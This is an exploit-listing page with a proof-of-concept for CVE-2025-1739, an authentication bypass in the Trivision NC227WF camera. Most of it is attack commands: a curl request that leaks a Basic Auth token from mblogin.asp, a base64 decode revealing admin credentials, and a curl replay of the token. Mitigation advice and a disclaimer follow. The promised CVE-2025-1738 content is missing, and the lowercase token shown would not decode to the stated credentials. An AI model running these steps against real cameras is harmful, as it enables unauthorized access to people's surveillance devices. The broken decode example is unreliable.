Share
## https://sploitus.com/exploit?id=0C96A29F-98F9-59CC-AC91-C35E0E2FF2E1
# CVE-2025-1738 & CVE-2025-1739 โ€” Trivision Camera NC227WF PoC


  
  
  



## ๐Ÿ“‹ Overview



| CVE | CVSS v3.1 | Score | CWE | Type |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | Authentication Bypass via Basic Auth Leak |

---



## ๐Ÿ”“ CVE-2025-1739 โ€” Basic Auth Code Exposure / Auth Bypass (CWE-288)

### Description

The camera leaks a **valid Base64-encoded Basic Authentication token** through the `mblogin.asp` endpoint. This token can be trivially decoded and reused to gain unauthorized access to the device โ€” no password knowledge required.

- **Attack Vector:** Adjacent Network (AV:A)
- **CVSS Score:** 7.1
- **CWE:** CWE-288 (Authentication Bypass Using an Alternate Path or Channel)

### Payload

```bash
curl -u admin:whatever http://: --request-target en/mobile/mblogin.asp
```



### Example Response

The response contains a valid Basic Auth token:

```
ywrtaw46vw5ndwvzc2fibguxmjmh
```

### Decoding the Token

```bash
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!
```

### Reusing the Token

```bash
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://:/
```

---


## ๐Ÿ›ก๏ธ Mitigation

- **Upgrade firmware** if a patched version is available from Trivision.
- **Isolate the camera** on a dedicated VLAN with no external access.
- **Firewall** the camera's management port from untrusted network segments.
- **Change default credentials** and rotate passwords regularly.
- Monitor for unexpected access to `activex_pal.asp` and `mblogin.asp`.



## โš–๏ธ Disclaimer

This repository is for **educational and authorized security research only**. The authors are not responsible for any misuse. Always obtain explicit permission before testing any device.